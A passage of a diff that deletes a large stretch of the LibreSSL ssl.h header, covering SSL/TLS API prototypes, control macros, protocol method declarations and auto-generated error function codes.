-#define SSL_set_dh_auto(s, onoff) \
-	SSL_ctrl(s,SSL_CTRL_SET_DH_AUTO,onoff,NULL)
-#define SSL_set_ecdh_auto(s, onoff) \
-	SSL_ctrl(s,SSL_CTRL_SET_ECDH_AUTO,onoff,NULL)
-
-int SSL_CTX_set1_groups(SSL_CTX *ctx, const int *groups, size_t groups_len);
-int SSL_CTX_set1_groups_list(SSL_CTX *ctx, const char *groups);
-
-int SSL_set1_groups(SSL *ssl, const int *groups, size_t groups_len);
-int SSL_set1_groups_list(SSL *ssl, const char *groups);
-
-int SSL_CTX_set_min_proto_version(SSL_CTX *ctx, uint16_t version);
-int SSL_CTX_set_max_proto_version(SSL_CTX *ctx, uint16_t version);
-
-int SSL_set_min_proto_version(SSL *ssl, uint16_t version);
-int SSL_set_max_proto_version(SSL *ssl, uint16_t version);
-
-#ifndef LIBRESSL_INTERNAL
-#define SSL_CTRL_SET_CURVES			SSL_CTRL_SET_GROUPS
-#define SSL_CTRL_SET_CURVES_LIST		SSL_CTRL_SET_GROUPS_LIST
-
-#define SSL_CTX_set1_curves SSL_CTX_set1_groups
-#define SSL_CTX_set1_curves_list SSL_CTX_set1_groups_list
-#define SSL_set1_curves SSL_set1_groups
-#define SSL_set1_curves_list SSL_set1_groups_list
-#endif
-
-#define SSL_CTX_add_extra_chain_cert(ctx,x509) \
-	SSL_CTX_ctrl(ctx,SSL_CTRL_EXTRA_CHAIN_CERT,0,(char *)x509)
-#define SSL_CTX_get_extra_chain_certs(ctx,px509) \
-	SSL_CTX_ctrl(ctx,SSL_CTRL_GET_EXTRA_CHAIN_CERTS,0,px509)
-#define SSL_CTX_clear_extra_chain_certs(ctx) \
-	SSL_CTX_ctrl(ctx,SSL_CTRL_CLEAR_EXTRA_CHAIN_CERTS,0,NULL)
-
-#define SSL_get_server_tmp_key(s, pk) \
-	SSL_ctrl(s,SSL_CTRL_GET_SERVER_TMP_KEY,0,pk)
-
-BIO_METHOD *BIO_f_ssl(void);
-BIO *BIO_new_ssl(SSL_CTX *ctx, int client);
-BIO *BIO_new_ssl_connect(SSL_CTX *ctx);
-BIO *BIO_new_buffer_ssl_connect(SSL_CTX *ctx);
-int BIO_ssl_copy_session_id(BIO *to, BIO *from);
-void BIO_ssl_shutdown(BIO *ssl_bio);
-
-int	SSL_CTX_set_cipher_list(SSL_CTX *, const char *str);
-SSL_CTX *SSL_CTX_new(const SSL_METHOD *meth);
-void	SSL_CTX_free(SSL_CTX *);
-long SSL_CTX_set_timeout(SSL_CTX *ctx, long t);
-long SSL_CTX_get_timeout(const SSL_CTX *ctx);
-X509_STORE *SSL_CTX_get_cert_store(const SSL_CTX *);
-void SSL_CTX_set_cert_store(SSL_CTX *, X509_STORE *);
-int SSL_want(const SSL *s);
-int	SSL_clear(SSL *s);
-
-void	SSL_CTX_flush_sessions(SSL_CTX *ctx, long tm);
-
-const SSL_CIPHER *SSL_get_current_cipher(const SSL *s);
-const SSL_CIPHER *SSL_CIPHER_get_by_id(unsigned int id);
-const SSL_CIPHER *SSL_CIPHER_get_by_value(uint16_t value);
-int	SSL_CIPHER_get_bits(const SSL_CIPHER *c, int *alg_bits);
-char *	SSL_CIPHER_get_version(const SSL_CIPHER *c);
-const char *	SSL_CIPHER_get_name(const SSL_CIPHER *c);
-unsigned long 	SSL_CIPHER_get_id(const SSL_CIPHER *c);
-uint16_t SSL_CIPHER_get_value(const SSL_CIPHER *c);
-
-int	SSL_get_fd(const SSL *s);
-int	SSL_get_rfd(const SSL *s);
-int	SSL_get_wfd(const SSL *s);
-const char  * SSL_get_cipher_list(const SSL *s, int n);
-char *	SSL_get_shared_ciphers(const SSL *s, char *buf, int len);
-int	SSL_get_read_ahead(const SSL * s);
-int	SSL_pending(const SSL *s);
-int	SSL_set_fd(SSL *s, int fd);
-int	SSL_set_rfd(SSL *s, int fd);
-int	SSL_set_wfd(SSL *s, int fd);
-void	SSL_set_bio(SSL *s, BIO *rbio, BIO *wbio);
-BIO *	SSL_get_rbio(const SSL *s);
-BIO *	SSL_get_wbio(const SSL *s);
-int	SSL_set_cipher_list(SSL *s, const char *str);
-void	SSL_set_read_ahead(SSL *s, int yes);
-int	SSL_get_verify_mode(const SSL *s);
-int	SSL_get_verify_depth(const SSL *s);
-int	(*SSL_get_verify_callback(const SSL *s))(int, X509_STORE_CTX *);
-void	SSL_set_verify(SSL *s, int mode,
-	    int (*callback)(int ok, X509_STORE_CTX *ctx));
-void	SSL_set_verify_depth(SSL *s, int depth);
-int	SSL_use_RSAPrivateKey(SSL *ssl, RSA *rsa);
-int	SSL_use_RSAPrivateKey_ASN1(SSL *ssl, unsigned char *d, long len);
-int	SSL_use_PrivateKey(SSL *ssl, EVP_PKEY *pkey);
-int	SSL_use_PrivateKey_ASN1(int pk, SSL *ssl, const unsigned char *d, long len);
-int	SSL_use_certificate(SSL *ssl, X509 *x);
-int	SSL_use_certificate_ASN1(SSL *ssl, const unsigned char *d, int len);
-
-int	SSL_use_RSAPrivateKey_file(SSL *ssl, const char *file, int type);
-int	SSL_use_PrivateKey_file(SSL *ssl, const char *file, int type);
-int	SSL_use_certificate_file(SSL *ssl, const char *file, int type);
-int	SSL_CTX_use_RSAPrivateKey_file(SSL_CTX *ctx, const char *file, int type);
-int	SSL_CTX_use_PrivateKey_file(SSL_CTX *ctx, const char *file, int type);
-int	SSL_CTX_use_certificate_file(SSL_CTX *ctx, const char *file, int type);
-int	SSL_CTX_use_certificate_chain_file(SSL_CTX *ctx, const char *file); /* PEM type */
-int	SSL_CTX_use_certificate_chain_mem(SSL_CTX *ctx, void *buf, int len);
-STACK_OF(X509_NAME) *SSL_load_client_CA_file(const char *file);
-int	SSL_add_file_cert_subjects_to_stack(STACK_OF(X509_NAME) *stackCAs,
-	    const char *file);
-int	SSL_add_dir_cert_subjects_to_stack(STACK_OF(X509_NAME) *stackCAs,
-	    const char *dir);
-
-void	SSL_load_error_strings(void );
-const char *SSL_state_string(const SSL *s);
-const char *SSL_rstate_string(const SSL *s);
-const char *SSL_state_string_long(const SSL *s);
-const char *SSL_rstate_string_long(const SSL *s);
-long	SSL_SESSION_get_time(const SSL_SESSION *s);
-long	SSL_SESSION_set_time(SSL_SESSION *s, long t);
-long	SSL_SESSION_get_timeout(const SSL_SESSION *s);
-long	SSL_SESSION_set_timeout(SSL_SESSION *s, long t);
-void	SSL_copy_session_id(SSL *to, const SSL *from);
-X509	*SSL_SESSION_get0_peer(SSL_SESSION *s);
-int	SSL_SESSION_set1_id_context(SSL_SESSION *s,
-	    const unsigned char *sid_ctx, unsigned int sid_ctx_len);
-
-SSL_SESSION *SSL_SESSION_new(void);
-const unsigned char *SSL_SESSION_get_id(const SSL_SESSION *s,
-	    unsigned int *len);
-unsigned int SSL_SESSION_get_compress_id(const SSL_SESSION *s);
-int	SSL_SESSION_print_fp(FILE *fp, const SSL_SESSION *ses);
-int	SSL_SESSION_print(BIO *fp, const SSL_SESSION *ses);
-void	SSL_SESSION_free(SSL_SESSION *ses);
-int	i2d_SSL_SESSION(SSL_SESSION *in, unsigned char **pp);
-int	SSL_set_session(SSL *to, SSL_SESSION *session);
-int	SSL_CTX_add_session(SSL_CTX *s, SSL_SESSION *c);
-int	SSL_CTX_remove_session(SSL_CTX *, SSL_SESSION *c);
-int	SSL_CTX_set_generate_session_id(SSL_CTX *, GEN_SESSION_CB);
-int	SSL_set_generate_session_id(SSL *, GEN_SESSION_CB);
-int	SSL_has_matching_session_id(const SSL *ssl, const unsigned char *id,
-	    unsigned int id_len);
-SSL_SESSION *d2i_SSL_SESSION(SSL_SESSION **a, const unsigned char **pp,
-	    long length);
-
-#ifdef HEADER_X509_H
-X509 *	SSL_get_peer_certificate(const SSL *s);
-#endif
-
-STACK_OF(X509) *SSL_get_peer_cert_chain(const SSL *s);
-
-int SSL_CTX_get_verify_mode(const SSL_CTX *ctx);
-int SSL_CTX_get_verify_depth(const SSL_CTX *ctx);
-int (*SSL_CTX_get_verify_callback(const SSL_CTX *ctx))(int, X509_STORE_CTX *);
-void SSL_CTX_set_verify(SSL_CTX *ctx, int mode,
-    int (*callback)(int, X509_STORE_CTX *));
-void SSL_CTX_set_verify_depth(SSL_CTX *ctx, int depth);
-void SSL_CTX_set_cert_verify_callback(SSL_CTX *ctx, int (*cb)(X509_STORE_CTX *, void *), void *arg);
-int SSL_CTX_use_RSAPrivateKey(SSL_CTX *ctx, RSA *rsa);
-int SSL_CTX_use_RSAPrivateKey_ASN1(SSL_CTX *ctx, const unsigned char *d, long len);
-int SSL_CTX_use_PrivateKey(SSL_CTX *ctx, EVP_PKEY *pkey);
-int SSL_CTX_use_PrivateKey_ASN1(int pk, SSL_CTX *ctx, const unsigned char *d, long len);
-int SSL_CTX_use_certificate(SSL_CTX *ctx, X509 *x);
-int SSL_CTX_use_certificate_ASN1(SSL_CTX *ctx, int len, const unsigned char *d);
-
-void SSL_CTX_set_default_passwd_cb(SSL_CTX *ctx, pem_password_cb *cb);
-void SSL_CTX_set_default_passwd_cb_userdata(SSL_CTX *ctx, void *u);
-
-int SSL_CTX_check_private_key(const SSL_CTX *ctx);
-int SSL_check_private_key(const SSL *ctx);
-
-int SSL_CTX_set_session_id_context(SSL_CTX *ctx, const unsigned char *sid_ctx, unsigned int sid_ctx_len);
-
-SSL *SSL_new(SSL_CTX *ctx);
-int SSL_set_session_id_context(SSL *ssl, const unsigned char *sid_ctx, unsigned int sid_ctx_len);
-
-int SSL_CTX_set_purpose(SSL_CTX *s, int purpose);
-int SSL_set_purpose(SSL *s, int purpose);
-int SSL_CTX_set_trust(SSL_CTX *s, int trust);
-int SSL_set_trust(SSL *s, int trust);
-
-int SSL_CTX_set1_param(SSL_CTX *ctx, X509_VERIFY_PARAM *vpm);
-int SSL_set1_param(SSL *ssl, X509_VERIFY_PARAM *vpm);
-
-
-void	SSL_free(SSL *ssl);
-int 	SSL_accept(SSL *ssl);
-int 	SSL_connect(SSL *ssl);
-int 	SSL_read(SSL *ssl, void *buf, int num);
-int 	SSL_peek(SSL *ssl, void *buf, int num);
-int 	SSL_write(SSL *ssl, const void *buf, int num);
-long	SSL_ctrl(SSL *ssl, int cmd, long larg, void *parg);
-long	SSL_callback_ctrl(SSL *, int, void (*)(void));
-long	SSL_CTX_ctrl(SSL_CTX *ctx, int cmd, long larg, void *parg);
-long	SSL_CTX_callback_ctrl(SSL_CTX *, int, void (*)(void));
-
-int	SSL_get_error(const SSL *s, int ret_code);
-const char *SSL_get_version(const SSL *s);
-
-/* This sets the 'default' SSL version that SSL_new() will create */
-int SSL_CTX_set_ssl_version(SSL_CTX *ctx, const SSL_METHOD *meth);
-
-const SSL_METHOD *SSLv23_method(void);		/* SSLv3 or TLSv1.* */
-const SSL_METHOD *SSLv23_server_method(void);	/* SSLv3 or TLSv1.* */
-const SSL_METHOD *SSLv23_client_method(void);	/* SSLv3 or TLSv1.* */
-
-const SSL_METHOD *TLSv1_method(void);		/* TLSv1.0 */
-const SSL_METHOD *TLSv1_server_method(void);	/* TLSv1.0 */
-const SSL_METHOD *TLSv1_client_method(void);	/* TLSv1.0 */
-
-const SSL_METHOD *TLSv1_1_method(void);		/* TLSv1.1 */
-const SSL_METHOD *TLSv1_1_server_method(void);	/* TLSv1.1 */
-const SSL_METHOD *TLSv1_1_client_method(void);	/* TLSv1.1 */
-
-const SSL_METHOD *TLSv1_2_method(void);		/* TLSv1.2 */
-const SSL_METHOD *TLSv1_2_server_method(void);	/* TLSv1.2 */
-const SSL_METHOD *TLSv1_2_client_method(void);	/* TLSv1.2 */
-
-const SSL_METHOD *TLS_method(void);		/* TLS v1.0 or later */
-const SSL_METHOD *TLS_server_method(void);	/* TLS v1.0 or later */
-const SSL_METHOD *TLS_client_method(void);	/* TLS v1.0 or later */
-
-const SSL_METHOD *DTLSv1_method(void);		/* DTLSv1.0 */
-const SSL_METHOD *DTLSv1_server_method(void);	/* DTLSv1.0 */
-const SSL_METHOD *DTLSv1_client_method(void);	/* DTLSv1.0 */
-
-STACK_OF(SSL_CIPHER) *SSL_get_ciphers(const SSL *s);
-
-int SSL_do_handshake(SSL *s);
-int SSL_renegotiate(SSL *s);
-int SSL_renegotiate_abbreviated(SSL *s);
-int SSL_renegotiate_pending(SSL *s);
-int SSL_shutdown(SSL *s);
-
-const SSL_METHOD *SSL_get_ssl_method(SSL *s);
-int SSL_set_ssl_method(SSL *s, const SSL_METHOD *method);
-const char *SSL_alert_type_string_long(int value);
-const char *SSL_alert_type_string(int value);
-const char *SSL_alert_desc_string_long(int value);
-const char *SSL_alert_desc_string(int value);
-
-void SSL_set_client_CA_list(SSL *s, STACK_OF(X509_NAME) *name_list);
-void SSL_CTX_set_client_CA_list(SSL_CTX *ctx, STACK_OF(X509_NAME) *name_list);
-STACK_OF(X509_NAME) *SSL_get_client_CA_list(const SSL *s);
-STACK_OF(X509_NAME) *SSL_CTX_get_client_CA_list(const SSL_CTX *s);
-int SSL_add_client_CA(SSL *ssl, X509 *x);
-int SSL_CTX_add_client_CA(SSL_CTX *ctx, X509 *x);
-
-void SSL_set_connect_state(SSL *s);
-void SSL_set_accept_state(SSL *s);
-
-long SSL_get_default_timeout(const SSL *s);
-
-int SSL_library_init(void );
-
-char *SSL_CIPHER_description(const SSL_CIPHER *, char *buf, int size);
-STACK_OF(X509_NAME) *SSL_dup_CA_list(STACK_OF(X509_NAME) *sk);
-
-SSL *SSL_dup(SSL *ssl);
-
-X509 *SSL_get_certificate(const SSL *ssl);
-/* EVP_PKEY */ struct evp_pkey_st *SSL_get_privatekey(SSL *ssl);
-
-void SSL_CTX_set_quiet_shutdown(SSL_CTX *ctx,int mode);
-int SSL_CTX_get_quiet_shutdown(const SSL_CTX *ctx);
-void SSL_set_quiet_shutdown(SSL *ssl,int mode);
-int SSL_get_quiet_shutdown(const SSL *ssl);
-void SSL_set_shutdown(SSL *ssl,int mode);
-int SSL_get_shutdown(const SSL *ssl);
-int SSL_version(const SSL *ssl);
-int SSL_CTX_set_default_verify_paths(SSL_CTX *ctx);
-int SSL_CTX_load_verify_locations(SSL_CTX *ctx, const char *CAfile,
-    const char *CApath);
-int SSL_CTX_load_verify_mem(SSL_CTX *ctx, void *buf, int len);
-#define SSL_get0_session SSL_get_session /* just peek at pointer */
-SSL_SESSION *SSL_get_session(const SSL *ssl);
-SSL_SESSION *SSL_get1_session(SSL *ssl); /* obtain a reference count */
-SSL_CTX *SSL_get_SSL_CTX(const SSL *ssl);
-SSL_CTX *SSL_set_SSL_CTX(SSL *ssl, SSL_CTX* ctx);
-void SSL_set_info_callback(SSL *ssl,
-    void (*cb)(const SSL *ssl, int type, int val));
-void (*SSL_get_info_callback(const SSL *ssl))(const SSL *ssl, int type, int val);
-int SSL_state(const SSL *ssl);
-void SSL_set_state(SSL *ssl, int state);
-
-void SSL_set_verify_result(SSL *ssl, long v);
-long SSL_get_verify_result(const SSL *ssl);
-
-int SSL_set_ex_data(SSL *ssl, int idx, void *data);
-void *SSL_get_ex_data(const SSL *ssl, int idx);
-int SSL_get_ex_new_index(long argl, void *argp, CRYPTO_EX_new *new_func,
-    CRYPTO_EX_dup *dup_func, CRYPTO_EX_free *free_func);
-
-int SSL_SESSION_set_ex_data(SSL_SESSION *ss, int idx, void *data);
-void *SSL_SESSION_get_ex_data(const SSL_SESSION *ss, int idx);
-int SSL_SESSION_get_ex_new_index(long argl, void *argp,
-    CRYPTO_EX_new *new_func, CRYPTO_EX_dup *dup_func,
-    CRYPTO_EX_free *free_func);
-
-int SSL_CTX_set_ex_data(SSL_CTX *ssl, int idx, void *data);
-void *SSL_CTX_get_ex_data(const SSL_CTX *ssl, int idx);
-int SSL_CTX_get_ex_new_index(long argl, void *argp, CRYPTO_EX_new *new_func,
-    CRYPTO_EX_dup *dup_func, CRYPTO_EX_free *free_func);
-
-int SSL_get_ex_data_X509_STORE_CTX_idx(void );
-
-#define SSL_CTX_sess_set_cache_size(ctx,t) \
-	SSL_CTX_ctrl(ctx,SSL_CTRL_SET_SESS_CACHE_SIZE,t,NULL)
-#define SSL_CTX_sess_get_cache_size(ctx) \
-	SSL_CTX_ctrl(ctx,SSL_CTRL_GET_SESS_CACHE_SIZE,0,NULL)
-#define SSL_CTX_set_session_cache_mode(ctx,m) \
-	SSL_CTX_ctrl(ctx,SSL_CTRL_SET_SESS_CACHE_MODE,m,NULL)
-#define SSL_CTX_get_session_cache_mode(ctx) \
-	SSL_CTX_ctrl(ctx,SSL_CTRL_GET_SESS_CACHE_MODE,0,NULL)
-
-#define SSL_CTX_get_default_read_ahead(ctx) SSL_CTX_get_read_ahead(ctx)
-#define SSL_CTX_set_default_read_ahead(ctx,m) SSL_CTX_set_read_ahead(ctx,m)
-#define SSL_CTX_get_read_ahead(ctx) \
-	SSL_CTX_ctrl(ctx,SSL_CTRL_GET_READ_AHEAD,0,NULL)
-#define SSL_CTX_set_read_ahead(ctx,m) \
-	SSL_CTX_ctrl(ctx,SSL_CTRL_SET_READ_AHEAD,m,NULL)
-#define SSL_CTX_get_max_cert_list(ctx) \
-	SSL_CTX_ctrl(ctx,SSL_CTRL_GET_MAX_CERT_LIST,0,NULL)
-#define SSL_CTX_set_max_cert_list(ctx,m) \
-	SSL_CTX_ctrl(ctx,SSL_CTRL_SET_MAX_CERT_LIST,m,NULL)
-#define SSL_get_max_cert_list(ssl) \
-	SSL_ctrl(ssl,SSL_CTRL_GET_MAX_CERT_LIST,0,NULL)
-#define SSL_set_max_cert_list(ssl,m) \
-	SSL_ctrl(ssl,SSL_CTRL_SET_MAX_CERT_LIST,m,NULL)
-
-#define SSL_CTX_set_max_send_fragment(ctx,m) \
-	SSL_CTX_ctrl(ctx,SSL_CTRL_SET_MAX_SEND_FRAGMENT,m,NULL)
-#define SSL_set_max_send_fragment(ssl,m) \
-	SSL_ctrl(ssl,SSL_CTRL_SET_MAX_SEND_FRAGMENT,m,NULL)
-
-/* NB: the keylength is only applicable when is_export is true */
-void SSL_CTX_set_tmp_rsa_callback(SSL_CTX *ctx,
-    RSA *(*cb)(SSL *ssl, int is_export, int keylength));
-
-void SSL_set_tmp_rsa_callback(SSL *ssl,
-    RSA *(*cb)(SSL *ssl, int is_export, int keylength));
-void SSL_CTX_set_tmp_dh_callback(SSL_CTX *ctx,
-    DH *(*dh)(SSL *ssl, int is_export, int keylength));
-void SSL_set_tmp_dh_callback(SSL *ssl,
-    DH *(*dh)(SSL *ssl, int is_export, int keylength));
-void SSL_CTX_set_tmp_ecdh_callback(SSL_CTX *ctx,
-    EC_KEY *(*ecdh)(SSL *ssl, int is_export, int keylength));
-void SSL_set_tmp_ecdh_callback(SSL *ssl,
-    EC_KEY *(*ecdh)(SSL *ssl, int is_export, int keylength));
-
-const void *SSL_get_current_compression(SSL *s);
-const void *SSL_get_current_expansion(SSL *s);
-
-const char *SSL_COMP_get_name(const void *comp);
-void *SSL_COMP_get_compression_methods(void);
-int SSL_COMP_add_compression_method(int id, void *cm);
-
-/* TLS extensions functions */
-int SSL_set_session_ticket_ext(SSL *s, void *ext_data, int ext_len);
-
-int SSL_set_session_ticket_ext_cb(SSL *s,
-    tls_session_ticket_ext_cb_fn cb, void *arg);
-
-/* Pre-shared secret session resumption functions */
-int SSL_set_session_secret_cb(SSL *s,
-    tls_session_secret_cb_fn tls_session_secret_cb, void *arg);
-
-void SSL_set_debug(SSL *s, int debug);
-int SSL_cache_hit(SSL *s);
-
-/* BEGIN ERROR CODES */
-/* The following lines are auto generated by the script mkerr.pl. Any changes
- * made after this point may be overwritten when the script is next run.
- */
-void ERR_load_SSL_strings(void);
-
-/* Error codes for the SSL functions. */
-
-/* Function codes. */
-#define SSL_F_CLIENT_CERTIFICATE			 100
-#define SSL_F_CLIENT_FINISHED				 167
-#define SSL_F_CLIENT_HELLO				 101
-#define SSL_F_CLIENT_MASTER_KEY				 102
-#define SSL_F_D2I_SSL_SESSION				 103
-#define SSL_F_DO_DTLS1_WRITE				 245
-#define SSL_F_DO_SSL3_WRITE				 104
-#define SSL_F_DTLS1_ACCEPT				 246
-#define SSL_F_DTLS1_ADD_CERT_TO_BUF			 295
-#define SSL_F_DTLS1_BUFFER_RECORD			 247
-#define SSL_F_DTLS1_CHECK_TIMEOUT_NUM			 316
-#define SSL_F_DTLS1_CLIENT_HELLO			 248
-#define SSL_F_DTLS1_CONNECT				 249
-#define SSL_F_DTLS1_ENC					 250
-#define SSL_F_DTLS1_GET_HELLO_VERIFY			 251
-#define SSL_F_DTLS1_GET_MESSAGE				 252
-#define SSL_F_DTLS1_GET_MESSAGE_FRAGMENT		 253
-#define SSL_F_DTLS1_GET_RECORD				 254
-#define SSL_F_DTLS1_HANDLE_TIMEOUT			 297
-#define SSL_F_DTLS1_HEARTBEAT				 305
-#define SSL_F_DTLS1_OUTPUT_CERT_CHAIN			 255
-#define SSL_F_DTLS1_PREPROCESS_FRAGMENT			 288
-#define SSL_F_DTLS1_PROCESS_OUT_OF_SEQ_MESSAGE		 256
-#define SSL_F_DTLS1_PROCESS_RECORD			 257
-#define SSL_F_DTLS1_READ_BYTES				 258
-#define SSL_F_DTLS1_READ_FAILED				 259
-#define SSL_F_DTLS1_SEND_CERTIFICATE_REQUEST		 260
-#define SSL_F_DTLS1_SEND_CLIENT_CERTIFICATE		 261
-#define SSL_F_DTLS1_SEND_CLIENT_KEY_EXCHANGE		 262
-#define SSL_F_DTLS1_SEND_CLIENT_VERIFY			 263
-#define SSL_F_DTLS1_SEND_HELLO_VERIFY_REQUEST		 264
-#define SSL_F_DTLS1_SEND_SERVER_CERTIFICATE		 265
-#define SSL_F_DTLS1_SEND_SERVER_HELLO			 266
-#define SSL_F_DTLS1_SEND_SERVER_KEY_EXCHANGE		 267
-#define SSL_F_DTLS1_WRITE_APP_DATA_BYTES		 268
-#define SSL_F_GET_CLIENT_FINISHED			 105
-#define SSL_F_GET_CLIENT_HELLO				 106
-#define SSL_F_GET_CLIENT_MASTER_KEY			 107
-#define SSL_F_GET_SERVER_FINISHED			 108
-#define SSL_F_GET_SERVER_HELLO				 109
-#define SSL_F_GET_SERVER_VERIFY				 110
-#define SSL_F_I2D_SSL_SESSION				 111
-#define SSL_F_READ_N					 112
-#define SSL_F_REQUEST_CERTIFICATE			 113
-#define SSL_F_SERVER_FINISH				 239
-#define SSL_F_SERVER_HELLO				 114
-#define SSL_F_SERVER_VERIFY				 240
-#define SSL_F_SSL23_ACCEPT				 115
-#define SSL_F_SSL23_CLIENT_HELLO			 116
-#define SSL_F_SSL23_CONNECT				 117
-#define SSL_F_SSL23_GET_CLIENT_HELLO			 118
-#define SSL_F_SSL23_GET_SERVER_HELLO			 119
-#define SSL_F_SSL23_PEEK				 237
-#define SSL_F_SSL23_READ				 120
-#define SSL_F_SSL23_WRITE				 121
-#define SSL_F_SSL2_ACCEPT				 122
-#define SSL_F_SSL2_CONNECT				 123
-#define SSL_F_SSL2_ENC_INIT				 124
-#define SSL_F_SSL2_GENERATE_KEY_MATERIAL		 241
-#define SSL_F_SSL2_PEEK					 234
-#define SSL_F_SSL2_READ					 125
-#define SSL_F_SSL2_READ_INTERNAL			 236
-#define SSL_F_SSL2_SET_CERTIFICATE			 126
-#define SSL_F_SSL2_WRITE				 127
-#define SSL_F_SSL3_ACCEPT				 128
-#define SSL_F_SSL3_ADD_CERT_TO_BUF			 296
-#define SSL_F_SSL3_CALLBACK_CTRL			 233
-#define SSL_F_SSL3_CHANGE_CIPHER_STATE			 129
-#define SSL_F_SSL3_CHECK_CERT_AND_ALGORITHM		 130
-#define SSL_F_SSL3_CHECK_CLIENT_HELLO			 304
-#define SSL_F_SSL3_CLIENT_HELLO				 131
-#define SSL_F_SSL3_CONNECT				 132
-#define SSL_F_SSL3_CTRL					 213
-#define SSL_F_SSL3_CTX_CTRL				 133
-#define SSL_F_SSL3_DIGEST_CACHED_RECORDS		 293
-#define SSL_F_SSL3_DO_CHANGE_CIPHER_SPEC		 292
-#define SSL_F_SSL3_ENC					 134
-#define SSL_F_SSL3_GENERATE_KEY_BLOCK			 238
-#define SSL_F_SSL3_GET_CERTIFICATE_REQUEST		 135
-#define SSL_F_SSL3_GET_CERT_STATUS			 289
-#define SSL_F_SSL3_GET_CERT_VERIFY			 136
-#define SSL_F_SSL3_GET_CLIENT_CERTIFICATE		 137
-#define SSL_F_SSL3_GET_CLIENT_HELLO			 138
-#define SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE		 139
-#define SSL_F_SSL3_GET_FINISHED				 140
-#define SSL_F_SSL3_GET_KEY_EXCHANGE			 141
-#define SSL_F_SSL3_GET_MESSAGE				 142
-#define SSL_F_SSL3_GET_NEW_SESSION_TICKET		 283
-#define SSL_F_SSL3_GET_NEXT_PROTO			 306
-#define SSL_F_SSL3_GET_RECORD				 143
-#define SSL_F_SSL3_GET_SERVER_CERTIFICATE		 144
-#define SSL_F_SSL3_GET_SERVER_DONE			 145
-#define SSL_F_SSL3_GET_SERVER_HELLO			 146
-#define SSL_F_SSL3_HANDSHAKE_MAC			 285
-#define SSL_F_SSL3_NEW_SESSION_TICKET			 287
-#define SSL_F_SSL3_OUTPUT_CERT_CHAIN			 147
-#define SSL_F_SSL3_PEEK					 235
-#define SSL_F_SSL3_READ_BYTES				 148
-#define SSL_F_SSL3_READ_N				 149
-#define SSL_F_SSL3_SEND_CERTIFICATE_REQUEST		 150
-#define SSL_F_SSL3_SEND_CLIENT_CERTIFICATE		 151
-#define SSL_F_SSL3_SEND_CLIENT_KEY_EXCHANGE		 152
-#define SSL_F_SSL3_SEND_CLIENT_VERIFY			 153
-#define SSL_F_SSL3_SEND_SERVER_CERTIFICATE		 154
-#define SSL_F_SSL3_SEND_SERVER_HELLO			 242
-#define SSL_F_SSL3_SEND_SERVER_KEY_EXCHANGE		 155
-#define SSL_F_SSL3_SETUP_KEY_BLOCK			 157
-#define SSL_F_SSL3_SETUP_READ_BUFFER			 156
-#define SSL_F_SSL3_SETUP_WRITE_BUFFER			 291
-#define SSL_F_SSL3_WRITE_BYTES				 158
-#define SSL_F_SSL3_WRITE_PENDING			 159
-#define SSL_F_SSL_ADD_CLIENTHELLO_RENEGOTIATE_EXT	 298
-#define SSL_F_SSL_ADD_CLIENTHELLO_TLSEXT		 277
-#define SSL_F_SSL_ADD_CLIENTHELLO_USE_SRTP_EXT		 307
-#define SSL_F_SSL_ADD_DIR_CERT_SUBJECTS_TO_STACK	 215
-#define SSL_F_SSL_ADD_FILE_CERT_SUBJECTS_TO_STACK	 216
-#define SSL_F_SSL_ADD_SERVERHELLO_RENEGOTIATE_EXT	 299
-#define SSL_F_SSL_ADD_SERVERHELLO_TLSEXT		 278
-#define SSL_F_SSL_ADD_SERVERHELLO_USE_SRTP_EXT		 308
-#define SSL_F_SSL_BAD_METHOD				 160
-#define SSL_F_SSL_BYTES_TO_CIPHER_LIST			 161
-#define SSL_F_SSL_CERT_DUP				 221
-#define SSL_F_SSL_CERT_INST				 222
-#define SSL_F_SSL_CERT_INSTANTIATE			 214
-#define SSL_F_SSL_CERT_NEW				 162
-#define SSL_F_SSL_CHECK_PRIVATE_KEY			 163
-#define SSL_F_SSL_CHECK_SERVERHELLO_TLSEXT		 280
-#define SSL_F_SSL_CHECK_SRVR_ECC_CERT_AND_ALG		 279
-#define SSL_F_SSL_CIPHER_PROCESS_RULESTR		 230
-#define SSL_F_SSL_CIPHER_STRENGTH_SORT			 231
-#define SSL_F_SSL_CLEAR					 164
-#define SSL_F_SSL_COMP_ADD_COMPRESSION_METHOD		 165
-#define SSL_F_SSL_CREATE_CIPHER_LIST			 166
-#define SSL_F_SSL_CTRL					 232
-#define SSL_F_SSL_CTX_CHECK_PRIVATE_KEY			 168
-#define SSL_F_SSL_CTX_MAKE_PROFILES			 309
-#define SSL_F_SSL_CTX_NEW				 169
-#define SSL_F_SSL_CTX_SET_CIPHER_LIST			 269
-#define SSL_F_SSL_CTX_SET_CLIENT_CERT_ENGINE		 290
-#define SSL_F_SSL_CTX_SET_PURPOSE			 226
-#define SSL_F_SSL_CTX_SET_SESSION_ID_CONTEXT		 219
-#define SSL_F_SSL_CTX_SET_SSL_VERSION			 170
-#define SSL_F_SSL_CTX_SET_TRUST				 229
-#define SSL_F_SSL_CTX_USE_CERTIFICATE			 171
-#define SSL_F_SSL_CTX_USE_CERTIFICATE_ASN1		 172
-#define SSL_F_SSL_CTX_USE_CERTIFICATE_CHAIN_FILE	 220
-#define SSL_F_SSL_CTX_USE_CERTIFICATE_FILE		 173
-#define SSL_F_SSL_CTX_USE_PRIVATEKEY			 174
-#define SSL_F_SSL_CTX_USE_PRIVATEKEY_ASN1		 175
-#define SSL_F_SSL_CTX_USE_PRIVATEKEY_FILE		 176
-#define SSL_F_SSL_CTX_USE_PSK_IDENTITY_HINT		 272
-#define SSL_F_SSL_CTX_USE_RSAPRIVATEKEY			 177
-#define SSL_F_SSL_CTX_USE_RSAPRIVATEKEY_ASN1		 178
-#define SSL_F_SSL_CTX_USE_RSAPRIVATEKEY_FILE		 179
-#define SSL_F_SSL_DO_HANDSHAKE				 180
-#define SSL_F_SSL_GET_NEW_SESSION			 181
-#define SSL_F_SSL_GET_PREV_SESSION			 217
-#define SSL_F_SSL_GET_SERVER_SEND_CERT			 182
-#define SSL_F_SSL_GET_SERVER_SEND_PKEY			 317
-#define SSL_F_SSL_GET_SIGN_PKEY				 183
-#define SSL_F_SSL_INIT_WBIO_BUFFER			 184
-#define SSL_F_SSL_LOAD_CLIENT_CA_FILE			 185
-#define SSL_F_SSL_NEW					 186
-#define SSL_F_SSL_PARSE_CLIENTHELLO_RENEGOTIATE_EXT	 300
-#define SSL_F_SSL_PARSE_CLIENTHELLO_TLSEXT		 302
